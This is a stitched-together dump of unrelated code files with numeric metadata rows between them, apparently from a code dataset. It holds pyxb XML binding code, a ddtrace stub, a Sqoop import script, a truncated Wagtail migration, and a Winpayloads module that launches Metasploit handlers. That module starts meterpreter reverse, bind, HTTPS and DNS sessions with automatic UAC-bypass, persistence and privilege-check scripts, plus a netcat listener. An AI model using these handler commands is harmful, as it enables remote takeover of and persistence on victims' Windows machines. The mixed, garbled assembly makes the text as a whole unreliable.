fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_31, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_32, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_32, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_33, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_33, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_34, True) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_34, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_34, False) ]))
st_34._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_35, True) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_35, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_35, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_35, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_35, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_35, False) ]))
st_35._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_36, True) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_36, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_36, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_36, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_36, False) ]))
st_36._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_37, True) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_37, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_37, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_37, False) ]))
st_37._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_38, True) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_38, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_38, False) ]))
st_38._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_39, True) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_39, False) ]))
st_39._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_40, True) ]))
st_40._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
Body_._Automaton = _BuildAutomaton_2()
Fault_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'faultcode'), pyxb.binding.datatypes.QName, scope=Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 112, 8)))
Fault_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'faultstring'), pyxb.binding.datatypes.string, scope=Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 113, 8)))
Fault_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'faultactor'), pyxb.binding.datatypes.anyURI, scope=Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 114, 8)))
Fault_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'detail'), detail, scope=Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 115, 8)))
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 114, 8))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 115, 8))
counters.add(cc_1)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(Fault_._UseForTag(pyxb.namespace.ExpandedName(None, 'faultcode')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 112, 8))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(Fault_._UseForTag(pyxb.namespace.ExpandedName(None, 'faultstring')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 113, 8))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Fault_._UseForTag(pyxb.namespace.ExpandedName(None, 'faultactor')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 114, 8))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(Fault_._UseForTag(pyxb.namespace.ExpandedName(None, 'detail')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 115, 8))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
Fault_._Automaton = _BuildAutomaton_3()
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 120, 8))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=pyxb.binding.content.Wildcard.NC_any), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 120, 8))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
detail._Automaton = _BuildAutomaton_4()
| 58.516678
| 409
| 0.743657
| 18,937
| 171,922
| 6.549876
| 0.02371
| 0.147539
| 0.162293
| 0.21115
| 0.818882
| 0.787197
| 0.782779
| 0.781384
| 0.7559
| 0.700407
| 0
| 0.03124
| 0.133462
| 171,922
| 2,937
| 410
| 58.536602
| 0.801338
| 0.041658
| 0
| 0.760724
| 1
| 0.000394
| 0.126297
| 0.11994
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002755
| false
| 0.003935
| 0.022432
| 0
| 0.086974
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a2da4cb3d4c122d1d326d604f8b0df707f21fbf1
| 68
|
py
|
Python
|
tests/profiling/uwsgi-app.py
|
p7g/dd-trace-py
|
141ac0ab6e9962e3b3bafc9de172076075289a19
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 308
|
2016-12-07T16:49:27.000Z
|
2022-03-15T10:06:45.000Z
|
tests/profiling/uwsgi-app.py
|
p7g/dd-trace-py
|
141ac0ab6e9962e3b3bafc9de172076075289a19
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1,928
|
2016-11-28T17:13:18.000Z
|
2022-03-31T21:43:19.000Z
|
tests/profiling/uwsgi-app.py
|
p7g/dd-trace-py
|
141ac0ab6e9962e3b3bafc9de172076075289a19
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 311
|
2016-11-27T03:01:49.000Z
|
2022-03-18T21:34:03.000Z
|
import ddtrace.profiling.auto # noqa
def application():
pass
| 11.333333
| 37
| 0.705882
| 8
| 68
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205882
| 68
| 5
| 38
| 13.6
| 0.888889
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
a2dfc9a6d085915c3816c5b8bfecf14263a47139
| 5,184
|
py
|
Python
|
lib/startmetasploit.py
|
roberto-cavalli1/Winpayloads
|
f8697cb9ce154ec9f44090719ba41eaa6c07fccf
|
[
"Apache-2.0"
] | 8
|
2018-01-12T19:02:38.000Z
|
2022-01-27T12:10:35.000Z
|
lib/startmetasploit.py
|
roberto-cavalli1/Winpayloads
|
f8697cb9ce154ec9f44090719ba41eaa6c07fccf
|
[
"Apache-2.0"
] | null | null | null |
lib/startmetasploit.py
|
roberto-cavalli1/Winpayloads
|
f8697cb9ce154ec9f44090719ba41eaa6c07fccf
|
[
"Apache-2.0"
] | 4
|
2018-01-06T07:19:18.000Z
|
2021-04-24T02:06:29.000Z
|
import os
class METASPLOIT(object):
def __init__(self):
if os.geteuid == 0:
self.placeholder = ''
else:
self.placeholder = 'sudo '
########Reverse########
def metrev_uac(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum))
def metrev_allchecks(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum))
def metrev_persistence(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum))
def metrev_normal(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum))
########Bind########
def metbind_uac(self,bindport,bindip):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip))
def metbind_allchecks(self,bindport,bindip):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip))
def metbind_persistence(self,bindport,bindip):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip))
def metbind_normal(self,bindport,bindip):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set ExitOnSession false; exploit -j \'' % (self.placeholder, bindport, bindip))
########Http########
def methttps_uac(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum))
def methttps_allchecks(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum))
def methttps_persistence(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum))
def methttps_normal(self,portnum):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set ExitOnSession false; exploit -j\'' % (self.placeholder, portnum))
########DNS########
def metdns_uac(self,portnum,DNSaddr):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum,DNSaddr))
def metdns_allchecks(self,portnum,DNSaddr):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum,DNSaddr))
def metdns_persistence(self,portnum,DNSaddr):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum,DNSaddr))
def metdns_normal(self,portnum,DNSaddr):
os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum,DNSaddr))
########NC#######
def nclisterner(self,portnum):
os.system('%snc -lvp %s'%(self.placeholder, portnum))
| 105.795918
| 287
| 0.741512
| 711
| 5,184
| 5.322082
| 0.092827
| 0.02537
| 0.080338
| 0.084567
| 0.928911
| 0.928911
| 0.928911
| 0.928911
| 0.928911
| 0.899841
| 0
| 0.00813
| 0.122106
| 5,184
| 48
| 288
| 108
| 0.823336
| 0.003858
| 0
| 0
| 0
| 0
| 0.056834
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.439024
| false
| 0.097561
| 0.02439
| 0
| 0.487805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
0c4f3931309a9f890e1f5024409981dc029d7273
| 1,667
|
py
|
Python
|
script/SqoopScript.py
|
wangfeigithub/mysql2hiveETL
|
ada8f6b69c5b09597141c3ef0ec0ca1ad8f586f1
|
[
"Apache-2.0"
] | 2
|
2019-08-14T02:29:32.000Z
|
2019-09-10T07:14:19.000Z
|
script/SqoopScript.py
|
wangfeigithub/mysql2hiveETL
|
ada8f6b69c5b09597141c3ef0ec0ca1ad8f586f1
|
[
"Apache-2.0"
] | null | null | null |
script/SqoopScript.py
|
wangfeigithub/mysql2hiveETL
|
ada8f6b69c5b09597141c3ef0ec0ca1ad8f586f1
|
[
"Apache-2.0"
] | 1
|
2019-09-10T07:14:21.000Z
|
2019-09-10T07:14:21.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/8/30 下午5:16
# @Author : wangfei
# hive脚本
# 有变化的数据去重合并
INCREMENT_ETL_SCRIPT = '''
/data/module/sqoop/bin/sqoop import -Dmapred.job.queue.name={}\
--connect jdbc:mysql://{}:3306/{}?tinyInt1isBit=false \
--username {} \
--password {} \
--table {} \
--columns "{}" \
--num-mappers {} \
--hive-import \
--hive-overwrite \
--hive-database {}_tmp \
--hive-table {}_increment \
--direct \
--delete-target-dir \
--where "({} >='{}' and {} <'{}') or ( {} >='{}' and {} <'{}' )"
'''
# 按照创建时间追加
APPEND_ETL_SCRIPT = '''
/data/module/sqoop/bin/sqoop import -Dmapred.job.queue.name={}\
--connect jdbc:mysql://{}:3306/{}?tinyInt1isBit=false \
--username {} \
--password {} \
--table {} \
--columns "{}" \
--num-mappers {} \
--hive-import \
--hive-database {} \
--hive-table {} \
--direct \
--delete-target-dir \
--where "{} >='{}' and {} <'{}'"
'''
# 全量导入
FULL_ETL_SCRIPT = '''
/data/module/sqoop/bin/sqoop import -Dmapred.job.queue.name={}\
--connect jdbc:mysql://{}:3306/{}?tinyInt1isBit=false \
--username {} \
--password {} \
--table {} \
--columns "{}" \
--num-mappers {} \
--hive-import \
--hive-overwrite \
--hive-database {} \
--hive-table {} \
--direct \
--delete-target-dir \
--where " {} <'{}'"
'''
| 27.327869
| 74
| 0.436713
| 137
| 1,667
| 5.255474
| 0.394161
| 0.0375
| 0.054167
| 0.079167
| 0.823611
| 0.823611
| 0.779167
| 0.779167
| 0.779167
| 0.670833
| 0
| 0.02381
| 0.344931
| 1,667
| 60
| 75
| 27.783333
| 0.635531
| 0.072585
| 0
| 0.829787
| 0
| 0
| 0.938231
| 0.191157
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.06383
| 0.12766
| 0
| 0.12766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
a75881445197d72bd73bde91bab7cc30237f6303
| 24,870
|
py
|
Python
|
example/demosite/migrations/0001_initial.py
|
cityofaustin/wagtail-publish-preflight
|
5a40d20a7811c67d2c2e085c8127c8d35103a5c8
|
[
"BSD-3-Clause"
] | 1
|
2019-12-12T21:19:00.000Z
|
2019-12-12T21:19:00.000Z
|
example/demosite/migrations/0001_initial.py
|
cityofaustin/wagtail-publish-preflight
|
5a40d20a7811c67d2c2e085c8127c8d35103a5c8
|
[
"BSD-3-Clause"
] | 12
|
2020-06-06T01:21:32.000Z
|
2022-02-10T13:52:28.000Z
|
example/demosite/migrations/0001_initial.py
|
cityofaustin/wagtail-publish-preflight
|
5a40d20a7811c67d2c2e085c8127c8d35103a5c8
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 2.2.8 on 2019-12-04 23:10
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.contrib.taggit
import modelcluster.fields
import wagtail.core.fields
class Migration(migrations.Migration):
    """Initial schema migration for the demosite example app.

    Auto-generated (per the "Generated by Django 2.2.8" header at the top
    of this file) — do not hand-edit field definitions; add a follow-up
    migration instead. Defines the Wagtail page types and their inline
    child models (related links, carousel items, speakers, tags).
    """

    # First migration for this app.
    initial = True

    # Wagtail core/images/docs and taggit schemas must exist first.
    dependencies = [
        ('wagtailimages', '0001_squashed_0021'),
        ('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'),
        ('wagtaildocs', '0010_document_file_hash'),
        ('taggit', '0003_taggeditem_add_unique_index'),
    ]

    operations = [
        # Page models inherit from wagtailcore.Page via the parent-link
        # OneToOneField 'page_ptr' (multi-table inheritance); child/inline
        # models attach to their page with a modelcluster ParentalKey and
        # are ordered by 'sort_order'.
        migrations.CreateModel(
            name='BlogEntryPage',
            fields=[
                ('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
                ('body', wagtail.core.fields.RichTextField()),
                ('date', models.DateField(verbose_name='Post date')),
                ('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='BlogIndexPage',
            fields=[
                ('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='EventIndexPage',
            fields=[
                ('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='EventPage',
            fields=[
                ('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
                ('date_from', models.DateField(verbose_name='Start date')),
                ('date_to', models.DateField(blank=True, help_text='Not required if event is on a single day', null=True, verbose_name='End date')),
                ('time_from', models.TimeField(blank=True, null=True, verbose_name='Start time')),
                ('time_to', models.TimeField(blank=True, null=True, verbose_name='End time')),
                ('audience', models.CharField(choices=[('public', 'Public'), ('private', 'Private')], max_length=255)),
                ('location', models.CharField(max_length=255)),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('cost', models.CharField(max_length=255)),
                ('signup_link', models.URLField(blank=True)),
                ('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='HomePage',
            fields=[
                ('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'verbose_name': 'homepage',
            },
            bases=('wagtailcore.page',),
        ),
        # PersonPage also inherits models.Model (contact fields mixin-style).
        migrations.CreateModel(
            name='PersonPage',
            fields=[
                ('telephone', models.CharField(blank=True, max_length=20)),
                ('email', models.EmailField(blank=True, max_length=254)),
                ('address_1', models.CharField(blank=True, max_length=255)),
                ('address_2', models.CharField(blank=True, max_length=255)),
                ('city', models.CharField(blank=True, max_length=255)),
                ('country', models.CharField(blank=True, max_length=255)),
                ('post_code', models.CharField(blank=True, max_length=10)),
                ('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
                ('first_name', models.CharField(max_length=255)),
                ('last_name', models.CharField(max_length=255)),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('biography', wagtail.core.fields.RichTextField(blank=True)),
                ('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page', models.Model),
        ),
        migrations.CreateModel(
            name='StandardIndexPage',
            fields=[
                ('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='StandardPage',
            fields=[
                ('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        # Inline child models below: each has its own auto PK and a
        # ParentalKey back to the owning page.
        migrations.CreateModel(
            name='StandardPageRelatedLink',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('title', models.CharField(help_text='Link title', max_length=255)),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.StandardPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='StandardPageCarouselItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
                ('caption', models.CharField(blank=True, max_length=255)),
                ('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
